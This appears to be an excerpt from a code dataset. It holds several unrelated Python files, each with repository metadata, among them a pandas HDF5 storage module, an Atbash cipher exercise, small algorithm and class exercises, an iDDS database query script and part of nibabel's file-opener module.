self.handle = _tables().openFile(self.path, self.mode)
def close(self):
"""
Close the PyTables file handle
"""
self.handle.close()
def flush(self):
"""
Force all buffered modifications to be written to disk
"""
self.handle.flush()
def get(self, key):
"""
Retrieve pandas object stored in file
Parameters
----------
key : object
Returns
-------
obj : type of object stored in file
"""
try:
group = getattr(self.handle.root, key)
return self._read_group(group)
except AttributeError:
raise
def select(self, key, where=None):
"""
Retrieve pandas object stored in file, optionally based on where
criteria
Parameters
----------
key : object
where : list, optional
Must be a list of dict objects of the following forms. Selection can
be performed on the 'index' or 'column' fields.
Comparison op
{'field' : 'index',
'op' : '>=',
'value' : value}
Match single value
{'field' : 'index',
'value' : v1}
Match a set of values
{'field' : 'index',
'value' : [v1, v2, v3]}
"""
group = getattr(self.handle.root, key, None)
if 'table' not in group._v_attrs.pandas_type:
raise Exception('can only select on objects written as tables')
if group is not None:
return self._read_group(group, where)
def put(self, key, value, table=False, append=False,
compression=None):
"""
Store object in HDFStore
Parameters
----------
key : object
value : {Series, DataFrame, Panel, LongPanel}
table : boolean, default False
Write as a PyTables Table structure which may perform worse but
allow more flexible operations like searching / selecting subsets of
the data
append : boolean, default False
For table data structures, append the input data to the existing
table
compression : {None, 'blosc', 'lzo', 'zlib'}, default None
Use a compression algorithm to compress the data
If None, the compression settings specified in the ctor will
be used.
"""
self._write_to_group(key, value, table=table, append=append,
comp=compression)
def _get_handler(self, op, kind):
return getattr(self,'_%s_%s' % (op, kind))
def remove(self, key, where=None):
"""
Remove pandas object partially by specifying the where condition
Parameters
----------
key : string
Node to remove or delete rows from
where : list
For Table node, delete specified rows. See HDFStore.select for more
information
Parameters
----------
key : object
"""
if where is None:
self.handle.removeNode(self.handle.root, key, recursive=True)
else:
group = getattr(self.handle.root, key)
self._delete_from_table(group, where)
def append(self, key, value):
"""
Append to Table in file. Node must already exist and be Table
format.
Parameters
----------
key : object
value : {Series, DataFrame, Panel, LongPanel}
Notes
-----
Does *not* check if data being appended overlaps with existing
data in the table, so be careful
"""
self._write_to_group(key, value, table=True, append=True)
def _write_to_group(self, key, value, table=False, append=False,
comp=None):
root = self.handle.root
if key not in root._v_children:
group = self.handle.createGroup(root, key)
else:
group = getattr(root, key)
kind = _TYPE_MAP[type(value)]
if table or (append and _is_table_type(group)):
kind = '%s_table' % kind
handler = self._get_handler(op='write', kind=kind)
wrapper = lambda value: handler(group, value, append=append,
comp=comp)
else:
if append:
raise ValueError('Can only append to Tables')
if comp:
raise ValueError('Compression only supported on Tables')
handler = self._get_handler(op='write', kind=kind)
wrapper = lambda value: handler(group, value)
wrapper(value)
group._v_attrs.pandas_type = kind
def _write_series(self, group, series):
self._write_index(group, 'index', series.index)
self._write_array(group, 'values', series.values)
def _write_frame(self, group, df):
self._write_block_manager(group, df._data)
def _read_frame(self, group, where=None):
return DataFrame(self._read_block_manager(group))
def _write_block_manager(self, group, data):
if not data.is_consolidated():
data = data.consolidate()
group._v_attrs.ndim = data.ndim
for i, ax in enumerate(data.axes):
self._write_index(group, 'axis%d' % i, ax)
# Supporting mixed-type DataFrame objects...nontrivial
nblocks = len(data.blocks)
group._v_attrs.nblocks = nblocks
for i in range(nblocks):
blk = data.blocks[i]
self._write_index(group, 'block%d_items' % i, blk.items)
self._write_array(group, 'block%d_values' % i, blk.values)
def _read_block_manager(self, group):
from pandas.core.internals import BlockManager, make_block
ndim = group._v_attrs.ndim
nblocks = group._v_attrs.nblocks
axes = []
for i in xrange(ndim):
ax = self._read_index(group, 'axis%d' % i)
axes.append(ax)
items = axes[0]
blocks = []
for i in range(group._v_attrs.nblocks):
blk_items = self._read_index(group, 'block%d_items' % i)
values = _read_array(group, 'block%d_values' % i)
blk = make_block(values, blk_items, items)
blocks.append(blk)
return BlockManager(blocks, axes)
def _write_frame_table(self, group, df, append=False, comp=None):
mat = df.values
values = mat.reshape((1,) + mat.shape)
if df._is_mixed_type:
raise Exception('Cannot currently store mixed-type DataFrame '
'objects in Table format')
self._write_table(group, items=['value'],
index=df.index, columns=df.columns,
values=values, append=append, compression=comp)
def _write_wide(self, group, panel):
panel._consolidate_inplace()
self._write_block_manager(group, panel._data)
def _read_wide(self, group, where=None):
return Panel(self._read_block_manager(group))
def _write_wide_table(self, group, panel, append=False, comp=None):
self._write_table(group, items=panel.items, index=panel.major_axis,
columns=panel.minor_axis, values=panel.values,
append=append, compression=comp)
def _read_wide_table(self, group, where=None):
return self._read_panel_table(group, where)
def _write_long(self, group, panel, append=False):
self._write_index(group, 'major_axis', panel.major_axis)
self._write_index(group, 'minor_axis', panel.minor_axis)
self._write_index(group, 'items', panel.items)
self._write_array(group, 'major_labels', panel.major_labels)
self._write_array(group, 'minor_labels', panel.minor_labels)
self._write_array(group, 'values', panel.values)
def _read_long(self, group, where=None):
from pandas.core.index import MultiIndex
items = self._read_index(group, 'items')
major_axis = self._read_index(group, 'major_axis')
minor_axis = self._read_index(group, 'minor_axis')
major_labels = _read_array(group, 'major_labels')
minor_labels = _read_array(group, 'minor_labels')
values = _read_array(group, 'values')
index = MultiIndex(levels=[major_axis, minor_axis],
labels=[major_labels, minor_labels])
return LongPanel(values, index=index, columns=items)
def _write_index(self, group, key, index):
if isinstance(index, MultiIndex):
setattr(group._v_attrs, '%s_variety' % key, 'multi')
self._write_multi_index(group, key, index)
else:
setattr(group._v_attrs, '%s_variety' % key, 'regular')
converted, kind, _ = _convert_index(index)
self._write_array(group, key, converted)
node = getattr(group, key)
node._v_attrs.kind = kind
def _read_index(self, group, key):
try:
variety = getattr(group._v_attrs, '%s_variety' % key)
except Exception:
variety = 'regular'
if variety == 'multi':
return self._read_multi_index(group, key)
elif variety == 'regular':
_, index = self._read_index_node(getattr(group, key))
return index
else:
raise Exception('unrecognized index variety')
def _write_multi_index(self, group, key, index):
setattr(group._v_attrs, '%s_nlevels' % key, index.nlevels)
for i, (lev, lab, name) in enumerate(zip(index.levels,
index.labels,
index.names)):
# write the level
conv_level, kind, _ = _convert_index(lev)
level_key = '%s_level%d' % (key, i)
self._write_array(group, level_key, conv_level)
node = getattr(group, level_key)
node._v_attrs.kind = kind
node._v_attrs.name = name
# write the name
setattr(node._v_attrs, '%s_name%d' % (key, i), name)
# write the labels
label_key = '%s_label%d' % (key, i)
self._write_array(group, label_key, lab)
def _read_multi_index(self, group, key):
nlevels = getattr(group._v_attrs, '%s_nlevels' % key)
levels = []
labels = []
names = []
for i in range(nlevels):
level_key = '%s_level%d' % (key, i)
name, lev = self._read_index_node(getattr(group, level_key))
levels.append(lev)
names.append(name)
label_key = '%s_label%d' % (key, i)
lab = getattr(group, label_key)[:]
labels.append(lab)
return MultiIndex(levels=levels, labels=labels, names=names)
def _read_index_node(self, node):
data = node[:]
kind = node._v_attrs.kind
try:
name = node._v_attrs.name
except Exception:
name = None
return name, _unconvert_index(data, kind)
def _write_array(self, group, key, value):
if key in group:
self.handle.removeNode(group, key)
if self.filters is not None:
atom = None
try:
# get the atom for this datatype
atom = _tables().Atom.from_dtype(value.dtype)
except ValueError:
pass
if atom is not None:
# create an empty chunked array and fill it from value
ca = self.handle.createCArray(group, key, atom,
value.shape,
filters=self.filters)
ca[:] = value
return
if value.dtype == np.object_:
vlarr = self.handle.createVLArray(group, key,
_tables().ObjectAtom())
vlarr.append(value)
else:
self.handle.createArray(group, key, value)
def _write_table(self, group, items=None, index=None, columns=None,
values=None, append=False, compression=None):
""" need to check for conform to the existing table:
e.g. columns should match """
# create dict of types
index_converted, index_kind, index_t = _convert_index(index)
columns_converted, cols_kind, col_t = _convert_index(columns)
# create the table if it doesn't exist (or get it if it does)
if not append:
if 'table' in group:
self.handle.removeNode(group, 'table')
if 'table' not in group:
# create the table
desc = {'index' : index_t,
'column' : col_t,
'values' : _tables().FloatCol(shape=(len(values)))}
options = {'name' : 'table',
'description' : desc}
if compression:
complevel = self.complevel
if complevel is None:
complevel = 9
filters = _tables().Filters(complevel=complevel,
complib=compression,
fletcher32=self.fletcher32)
options['filters'] = filters
elif self.filters is not None:
options['filters'] = self.filters
table = self.handle.createTable(group, **options)
else:
# the table must already exist
table = getattr(group, 'table', None)
# add kinds
table._v_attrs.index_kind = index_kind
table._v_attrs.columns_kind = cols_kind
table._v_attrs.fields = list(items)
# add the rows
try:
for i, index in enumerate(index_converted):
for c, col in enumerate(columns_converted):
v = values[:, i, c]
# don't store the row if all values are np.nan
if np.isnan(v).all():
continue
row = table.row
row['index'] = index
row['column'] = col
# create the values array
row['values'] = v
row.append()
self.handle.flush()
except (ValueError), detail: # pragma: no cover
print "value_error in _write_table -> %s" % str(detail)
try:
self.handle.flush()
except Exception:
pass
raise
def _read_group(self, group, where=None):
kind = group._v_attrs.pandas_type
kind = _LEGACY_MAP.get(kind, kind)
handler = self._get_handler(op='read', kind=kind)
return handler(group, where)
def _read_series(self, group, where=None):
index = self._read_index(group, 'index')
values = _read_array(group, 'values')
return Series(values, index=index)
def _read_legacy_series(self, group, where=None):
index = self._read_index_legacy(group, 'index')
values = _read_array(group, 'values')
return Series(values, index=index)
def _read_legacy_frame(self, group, where=None):
index = self._read_index_legacy(group, 'index')
columns = self._read_index_legacy(group, 'columns')
values = _read_array(group, 'values')
return DataFrame(values, index=index, columns=columns)
def _read_index_legacy(self, group, key):
node = getattr(group, key)
data = node[:]
kind = node._v_attrs.kind
return _unconvert_index_legacy(data, kind)
def _read_frame_table(self, group, where=None):
return self._read_panel_table(group, where)['value']
def _read_panel_table(self, group, where=None):
from pandas.core.common import _asarray_tuplesafe
table = getattr(group, 'table')
# create the selection
sel = Selection(table, where)
sel.select()
fields = table._v_attrs.fields
columns = _maybe_convert(sel.values['column'],
table._v_attrs.columns_kind)
index = _maybe_convert(sel.values['index'],
table._v_attrs.index_kind)
# reconstruct
long_index = MultiIndex.from_arrays([index, columns])
lp = LongPanel(sel.values['values'], index=long_index,
columns=fields)
if lp.consistent:
lp = lp.sortlevel(level=0)
wp = lp.to_wide()
else:
if not self._quiet:
print ('Duplicate entries in table, taking most recently '
'appended')
# need a better algorithm
tuple_index = long_index.get_tuple_index()
index_map = _tseries.map_indices_buf(tuple_index)
unique_tuples = _tseries.fast_unique(tuple_index)
unique_tuples = _asarray_tuplesafe(unique_tuples)
indexer, _ = _tseries.getMergeVec(unique_tuples, index_map)
new_index = long_index.take(indexer)
new_values = lp.values.take(indexer, axis=0)
lp = LongPanel(new_values, index=new_index, columns=lp.columns)
wp = lp.to_wide()
if sel.column_filter:
new_minor = sorted(set(wp.minor_axis) & sel.column_filter)
wp = wp.reindex(minor=new_minor)
return wp
def _delete_from_table(self, group, where = None):
table = getattr(group, 'table')
# create the selection
s = Selection(table,where)
s.select_coords()
# delete the rows in reverse order
l = list(s.values)
l.reverse()
for c in l:
table.removeRows(c)
self.handle.flush()
return len(s.values)
def _convert_index(index):
# Let's assume the index is homogeneous
values = np.asarray(index)
import time
if isinstance(values[0], datetime):
converted = np.array([time.mktime(v.timetuple())
for v in values], dtype=np.int64)
return converted, 'datetime', _tables().Time64Col()
elif isinstance(values[0], basestring):
converted = np.array(list(values), dtype=np.str_)
itemsize = converted.dtype.itemsize
return converted, 'string', _tables().StringCol(itemsize)
elif isinstance(values[0], (long, int, np.integer)):
# take a guess for now, hope the values fit
atom = _tables().Int64Col()
return np.asarray(values, dtype=np.int64), 'integer', atom
else: # pragma: no cover
raise ValueError('unrecognized index type %s' % type(values[0]))
def _read_array(group, key):
import tables
node = getattr(group, key)
data = node[:]
if isinstance(node, tables.VLArray):
return data[0]
else:
return data
def _unconvert_index(data, kind):
if kind == 'datetime':
index = np.array([datetime.fromtimestamp(v) for v in data],
dtype=object)
elif kind in ('string', 'integer'):
index = np.array(data, dtype=object)
else: # pragma: no cover
raise ValueError('unrecognized index type %s' % kind)
return index
def _unconvert_index_legacy(data, kind, legacy=False):
if kind == 'datetime':
index = _tseries.array_to_datetime(data)
elif kind in ('string', 'integer'):
index = np.array(data, dtype=object)
else: # pragma: no cover
raise ValueError('unrecognized index type %s' % kind)
return index
def _maybe_convert(values, val_kind):
if _need_convert(val_kind):
conv = _get_converter(val_kind)
conv = np.frompyfunc(conv, 1, 1)
values = conv(values)
return values
def _get_converter(kind):
if kind == 'datetime':
return datetime.fromtimestamp
else: # pragma: no cover
raise ValueError('invalid kind %s' % kind)
def _need_convert(kind):
if kind == 'datetime':
return True
return False
def _is_table_type(group):
try:
return 'table' in group._v_attrs.pandas_type
except AttributeError:
# new node, e.g.
return False
class Selection(object):
"""
Carries out a selection operation on a tables.Table object.
Parameters
----------
table : tables.Table
where : list of dicts of the following form
Comparison op
{'field' : 'index',
'op' : '>=',
'value' : value}
Match single value
{'field' : 'index',
'value' : v1}
Match a set of values
{'field' : 'index',
'value' : [v1, v2, v3]}
"""
def __init__(self, table, where=None):
self.table = table
self.where = where
self.column_filter = None
self.the_condition = None
self.conditions = []
self.values = None
if where:
self.generate(where)
def generate(self, where):
# and condictions
for c in where:
op = c.get('op',None)
value = c['value']
field = c['field']
if field == 'index' and isinstance(value, datetime):
value = time.mktime(value.timetuple())
self.conditions.append('(%s %s %s)' % (field,op,value))
else:
self.generate_multiple_conditions(op,value,field)
if len(self.conditions):
self.the_condition = '(' + ' & '.join(self.conditions) + ')'
def generate_multiple_conditions(self, op, value, field):
if op and op == 'in' or isinstance(value, (list, np.ndarray)):
if len(value) <= 61:
l = '(' + ' | '.join([ "(%s == '%s')" % (field,v)
for v in value ]) + ')'
self.conditions.append(l)
else:
self.column_filter = set(value)
else:
if op is None:
op = '=='
self.conditions.append('(%s %s "%s")' % (field,op,value))
def select(self):
"""
generate the selection
"""
if self.the_condition:
self.values = self.table.readWhere(self.the_condition)
else:
self.values = self.table.read()
def select_coords(self):
"""
generate the selection
"""
self.values = self.table.getWhereList(self.the_condition)
|
[
"[email protected]"
] | |
bdd739e1d194e3350e8d261608f052aa2d1cd68a
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/atbash-cipher/780f7c2ca2024289b7e86d67c77cdb0a.py
|
f4cb4e0b4a787f169f151619ad13150dc07cb867
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null |
UTF-8
|
Python
| false | false | 769 |
py
|
import re
def decode(ciphertext):
plaintext = ''
for c in list(ciphertext):
if c.isalpha():
tmp = ord('z') - ord(c)
plaintext += chr(ord('a') + tmp)
elif c.isdigit():
plaintext += c
return plaintext
def encode(plaintext):
ciphertext = ''
temptext = ''
cs = list(plaintext.lower())
for c in cs:
if c.isalpha():
tmp = ord(c) - ord('a')
temptext += chr(ord('z') - tmp)
elif c.isdigit():
temptext += c
if len(temptext) > 5:
i = 0
for i in range(0, len(temptext) - 5, 5):
ciphertext += temptext[i:i+5] + ' '
ciphertext += temptext[i+5:]
else:
ciphertext = temptext
return ciphertext
|
[
"[email protected]"
] | |
0f7f10326711a4cf4fffb689aed806f4d12d3b06
|
632b94beca62f7c8af5ae1d1e8e095a352600429
|
/build_isolated/moveit_commander/catkin_generated/pkg.develspace.context.pc.py
|
74d5b57eac50e95ed76ceddf9025312701f4f5af
|
[] |
no_license
|
Haoran-Zhao/US_UR3
|
d9eb17a7eceed75bc623be4f4db417a38f5a9f8d
|
a0c25e1daf613bb45dbd08075e3185cb9cd03657
|
refs/heads/master
| 2020-08-31T07:02:45.403001 | 2020-05-27T16:58:52 | 2020-05-27T16:58:52 | 218,629,020 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 401 |
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "moveit_commander"
PROJECT_SPACE_DIR = "/home/haoran/US_UR3/devel_isolated/moveit_commander"
PROJECT_VERSION = "1.0.1"
|
[
"[email protected]"
] | |
81bffd876a4fdc0b34dd8eb8599fa803daf88a30
|
bd8bc7abe0f774f84d8275c43b2b8c223d757865
|
/368_LargestDivisibleSubset/largestDivisibleSubset.py
|
0e89bdcccb45f3131c6fcbaaeee76f58dde3360f
|
[
"MIT"
] |
permissive
|
excaliburnan/SolutionsOnLeetcodeForZZW
|
bde33ab9aebe9c80d9f16f9a62df72d269c5e187
|
64018a9ead8731ef98d48ab3bbd9d1dd6410c6e7
|
refs/heads/master
| 2023-04-07T03:00:06.315574 | 2021-04-21T02:12:39 | 2021-04-21T02:12:39 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 473 |
py
|
class Solution:
def largestDivisibleSubset(self, nums: List[int]) -> List[int]:
nums.sort()
# dp[i] 表示 nums[i] 的约数集合
dp = [[x] for x in nums]
ans = []
for i in range(len(nums)):
for j in range(i):
if nums[i] % nums[j] == 0 and len(dp[j]) + 1 > len(dp[i]):
dp[i] = dp[j] + [nums[i]]
if len(dp[i]) > len(ans):
ans = dp[i]
return ans
|
[
"[email protected]"
] | |
f91fc4e82fe4ba7dd8fc849c4ffedc5c245bcd1a
|
677fa54f9c8b48a813ff7b207817d1a3acc8ed25
|
/main/lib/idds/tests/run_sql.py
|
2e948042286c38b784fb2d53e1b239de536e453c
|
[
"Apache-2.0"
] |
permissive
|
HSF/iDDS
|
2a88cb35ebbf35c7e3427369a94c6b9d73c16182
|
193a95ec7ee154a2615fa8dcd99a79df5ddd3bec
|
refs/heads/master
| 2023-08-31T11:10:10.410663 | 2023-08-25T14:03:17 | 2023-08-25T14:03:17 | 183,081,241 | 3 | 9 |
NOASSERTION
| 2023-09-14T11:55:03 | 2019-04-23T19:18:37 |
Python
|
UTF-8
|
Python
| false | false | 1,990 |
py
|
#!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0OA
#
# Authors:
# - Wen Guan, <[email protected]>, 2019
"""
performance test to insert contents.
"""
import json
import cx_Oracle
from idds.common.config import config_get
# from idds.core.contents import add_content
def get_subfinished_requests(db_pool):
connection = db_pool.acquire()
req_ids = []
# sql = """select request_id from atlas_IDDS.requests where status in (4,5) and scope!='hpo'"""
sql = """select request_id from atlas_IDDS.requests where scope!='hpo' and ( status in (4,5) or request_id in (select request_id from atlas_idds.transforms where status in (4, 5) and transform_type=2)) order by request_id"""
sql = """select request_id from atlas_idds.collections where status=4 and total_files > processed_files order by request_id asc"""
sql = """select request_metadata, processing_metadata from atlas_idds.requests where request_id in (283511)"""
cursor = connection.cursor()
cursor.execute(sql)
rows = cursor.fetchall()
for row in rows:
# print(row)
# print(row[0])
data = json.loads(row[0].read())
print(json.dumps(data, sort_keys=True, indent=4))
req_ids.append(row[0])
cursor.close()
connection.commit()
db_pool.release(connection)
print(len(req_ids))
print(req_ids)
def get_session_pool():
sql_connection = config_get('database', 'default')
sql_connection = sql_connection.replace("oracle://", "")
user_pass, tns = sql_connection.split('@')
user, passwd = user_pass.split(':')
db_pool = cx_Oracle.SessionPool(user, passwd, tns, min=12, max=20, increment=1)
return db_pool
def test():
pool = get_session_pool()
get_subfinished_requests(pool)
if __name__ == '__main__':
test()
|
[
"[email protected]"
] | |
bee6572bdf3ba51f555860b1eca5428bf08419a8
|
ce3bd1c0f8ecb9bbe41ded050c702a35e82191f5
|
/khat3680_l04/src/t01.py
|
96aab39ff0aa54e8740da4a33efec24ebb80e6df
|
[] |
no_license
|
khat3680/Data_Sturct_Python
|
e368133d01cd790206f49e3f401b73961234955a
|
4ae75031b3abf36119331064bb119061ae6cd586
|
refs/heads/master
| 2022-12-10T02:59:01.016483 | 2020-09-11T16:46:31 | 2020-09-11T16:46:31 | 294,755,366 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 392 |
py
|
"""
-------------------------------------------------------
[program 1]
-------------------------------------------------------
Author: Anshul Khatri
ID: 193313680
Email: [email protected]
Section: CP164 Winter 2020
__updated__ = "2020-02-05"
-------------------------------------------------------
"""
from Food import Food
key_ = Food('Spring Rolls', 1, None, None)
print(key_)
|
[
"[email protected]"
] | |
58cf908172c2c19f3b964ed05323f0906af4c37e
|
5955ea34fd72c719f3cb78fbb3c7e802a2d9109a
|
/_STRUCTURES/String/deploy_str.py
|
b8cdf6f0aa4981933a3160534357a36a9727c468
|
[] |
no_license
|
AndreySperansky/TUITION
|
3c90ac45f11c70dce04008adc1e9f9faad840b90
|
583d3a760d1f622689f6f4f482c905b065d6c732
|
refs/heads/master
| 2022-12-21T21:48:21.936988 | 2020-09-28T23:18:40 | 2020-09-28T23:18:40 | 299,452,924 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 219 |
py
|
first = input("Введите первую букву :")
last = input("Введите последнюю букву :")
newStr = ""
while first <= last:
newStr += first
first = chr(ord(first)+ 1)
print(newStr)
|
[
"[email protected]"
] | |
62c04ba164efc46580a8e29802b2c3105d28e244
|
114c1f7ceff04e00591f46eeb0a2eb387ac65710
|
/g4g/DS/Graphs/Introductions_and_traversals/10_prac.py
|
b8308399c38cc993c17302967aa9c44a0beebb89
|
[] |
no_license
|
sauravgsh16/DataStructures_Algorithms
|
0783a5e6dd00817ac0b6f2b856ad8d82339a767d
|
d3133f026f972f28bd038fcee9f65784f5d3ea8b
|
refs/heads/master
| 2020-04-23T03:00:29.713877 | 2019-11-25T10:52:33 | 2019-11-25T10:52:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 945 |
py
|
''' Iterative DFS '''
class Graph(object):
def __init__(self, vertices):
self.V = vertices
self.adj = [[] for i in range(self.V)]
def add_edge(self, src, dest):
self.adj[src].append(dest)
def DFS_Util(self, s, visited):
stack = []
stack.append(s)
while len(stack) != 0:
s = stack.pop()
if visited[s] == False:
print s,
visited[s] = True
i = 0
while i < len(self.adj[s]):
if visited[self.adj[s][i]] == False:
stack.append(self.adj[s][i])
i += 1
def dfs(self):
visited = [False] * self.V
for i in range(self.V):
if visited[i] == False:
self.DFS_Util(i, visited)
g1 = Graph(5)
g1.add_edge(1, 0)
g1.add_edge(0, 2)
g1.add_edge(2, 1)
g1.add_edge(0, 3)
g1.add_edge(1, 4)
g1.dfs()
|
[
"[email protected]"
] | |
25b0c8725635d704fb1f7630816a948146eeb750
|
155fa6aaa4ef31cc0dbb54b7cf528f36743b1663
|
/Polymorphism and Abstraction/wild_farm/animals/birds.py
|
41ba401c5676fd4ca96f767957cdbdc132188929
|
[] |
no_license
|
GBoshnakov/SoftUni-OOP
|
efe77b5e1fd7d3def19338cc7819f187233ecab0
|
0145abb760b7633ca326d06a08564fad3151e1c5
|
refs/heads/main
| 2023-07-13T18:54:39.761133 | 2021-08-27T08:31:07 | 2021-08-27T08:31:07 | 381,711,275 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 628 |
py
|
from wild_farm.animals.animal import Bird
from wild_farm.food import Meat
class Hen(Bird):
weight_gainer = 0.35
def make_sound(self):
return "Cluck"
def feed(self, food):
self.weight += food.quantity * Hen.weight_gainer
self.food_eaten += food.quantity
class Owl(Bird):
weight_gainer = 0.25
def make_sound(self):
return "Hoot Hoot"
def feed(self, food):
if type(food) != Meat:
return f"{type(self).__name__} does not eat {type(food).__name__}!"
self.weight += food.quantity * Owl.weight_gainer
self.food_eaten += food.quantity
|
[
"[email protected]"
] | |
f47a10d8f4a3f749041c6241c6d0fd65b7ff1a94
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/303/usersdata/296/78905/submittedfiles/testes.py
|
a1d13bb4b7617dba4b5f62c6fc00e07d617132c1
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 217 |
py
|
# -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
n = int(input("Digite o primeiro número: "))
m = int(input("Digite o segundo número: "))
soma = m + n
if soma>10:
print(soma)
else:
print("Não sei")
|
[
"[email protected]"
] | |
d09aff13b635db27d2ff88145cbb666e5953d834
|
d094ba0c8a9b1217fbf014aa79a283a49aabe88c
|
/env/lib/python3.6/site-packages/nibabel/openers.py
|
e5514045614eb4e640823461dde15e9dc9b56831
|
[
"Apache-2.0"
] |
permissive
|
Raniac/NEURO-LEARN
|
d9274e0baadd97bb02da54bdfcf6ca091fc1c703
|
3c3acc55de8ba741e673063378e6cbaf10b64c7a
|
refs/heads/master
| 2022-12-25T23:46:54.922237 | 2020-09-06T03:15:14 | 2020-09-06T03:15:14 | 182,013,100 | 9 | 2 |
Apache-2.0
| 2022-12-09T21:01:00 | 2019-04-18T03:57:00 |
CSS
|
UTF-8
|
Python
| false | false | 9,177 |
py
|
# emacs: -*- mode: python-mode; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the NiBabel package for the
# copyright and license terms.
#
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
""" Context manager openers for various fileobject types
"""
import sys
if sys.version_info[0] < 3:
from bz2file import BZ2File
else:
from bz2 import BZ2File
import gzip
import sys
import warnings
from os.path import splitext
from distutils.version import StrictVersion
# is indexed_gzip present and modern?
try:
import indexed_gzip as igzip
version = igzip.__version__
HAVE_INDEXED_GZIP = True
# < 0.7 - no good
if StrictVersion(version) < StrictVersion('0.7.0'):
warnings.warn('indexed_gzip is present, but too old '
'(>= 0.7.0 required): {})'.format(version))
HAVE_INDEXED_GZIP = False
# >= 0.8 SafeIndexedGzipFile renamed to IndexedGzipFile
elif StrictVersion(version) < StrictVersion('0.8.0'):
IndexedGzipFile = igzip.SafeIndexedGzipFile
else:
IndexedGzipFile = igzip.IndexedGzipFile
del igzip, version
except ImportError:
HAVE_INDEXED_GZIP = False
# The largest memory chunk that gzip can use for reads
GZIP_MAX_READ_CHUNK = 100 * 1024 * 1024 # 100Mb
class BufferedGzipFile(gzip.GzipFile):
"""GzipFile able to readinto buffer >= 2**32 bytes.
This class only differs from gzip.GzipFile
in Python 3.5.0.
This works around a known issue in Python 3.5.
See https://bugs.python.org/issue25626
"""
# This helps avoid defining readinto in Python 2.6,
# where it is undefined on gzip.GzipFile.
# It also helps limit the exposure to this code.
if sys.version_info[:3] == (3, 5, 0):
def __init__(self, fileish, mode='rb', compresslevel=9,
buffer_size=2**32 - 1):
super(BufferedGzipFile, self).__init__(fileish, mode=mode,
compresslevel=compresslevel)
self.buffer_size = buffer_size
def readinto(self, buf):
"""Uses self.buffer_size to do a buffered read."""
n_bytes = len(buf)
if n_bytes < 2 ** 32:
return super(BufferedGzipFile, self).readinto(buf)
# This works around a known issue in Python 3.5.
# See https://bugs.python.org/issue25626
mv = memoryview(buf)
n_read = 0
max_read = 2 ** 32 - 1 # Max for unsigned 32-bit integer
while (n_read < n_bytes):
n_wanted = min(n_bytes - n_read, max_read)
n_got = super(BufferedGzipFile, self).readinto(
mv[n_read:n_read + n_wanted])
n_read += n_got
if n_got != n_wanted:
break
return n_read
def _gzip_open(filename, mode='rb', compresslevel=9, keep_open=False):
# use indexed_gzip if possible for faster read access. If keep_open ==
# True, we tell IndexedGzipFile to keep the file handle open. Otherwise
# the IndexedGzipFile will close/open the file on each read.
if HAVE_INDEXED_GZIP and mode == 'rb':
gzip_file = IndexedGzipFile(filename, drop_handles=not keep_open)
# Fall-back to built-in GzipFile (wrapped with the BufferedGzipFile class
# defined above)
else:
gzip_file = BufferedGzipFile(filename, mode, compresslevel)
# Speedup for #209, for versions of python < 3.5. Open gzip files with
# faster reads on large files using a larger read buffer. See
# https://github.com/nipy/nibabel/pull/210 for discussion
if hasattr(gzip_file, 'max_read_chunk'):
gzip_file.max_read_chunk = GZIP_MAX_READ_CHUNK
return gzip_file
class Opener(object):
""" Class to accept, maybe open, and context-manage file-likes / filenames
Provides context manager to close files that the constructor opened for
you.
Parameters
----------
fileish : str or file-like
if str, then open with suitable opening method. If file-like, accept as
is
\*args : positional arguments
passed to opening method when `fileish` is str. ``mode``, if not
specified, is `rb`. ``compresslevel``, if relevant, and not specified,
is set from class variable ``default_compresslevel``. ``keep_open``, if
relevant, and not specified, is ``False``.
\*\*kwargs : keyword arguments
passed to opening method when `fileish` is str. Change of defaults as
for \*args
"""
gz_def = (_gzip_open, ('mode', 'compresslevel', 'keep_open'))
bz2_def = (BZ2File, ('mode', 'buffering', 'compresslevel'))
compress_ext_map = {
'.gz': gz_def,
'.bz2': bz2_def,
None: (open, ('mode', 'buffering')) # default
}
#: default compression level when writing gz and bz2 files
default_compresslevel = 1
#: whether to ignore case looking for compression extensions
compress_ext_icase = True
def __init__(self, fileish, *args, **kwargs):
if self._is_fileobj(fileish):
self.fobj = fileish
self.me_opened = False
self._name = None
return
opener, arg_names = self._get_opener_argnames(fileish)
# Get full arguments to check for mode and compresslevel
full_kwargs = kwargs.copy()
n_args = len(args)
full_kwargs.update(dict(zip(arg_names[:n_args], args)))
# Set default mode
if 'mode' not in full_kwargs:
kwargs['mode'] = 'rb'
# Default compression level
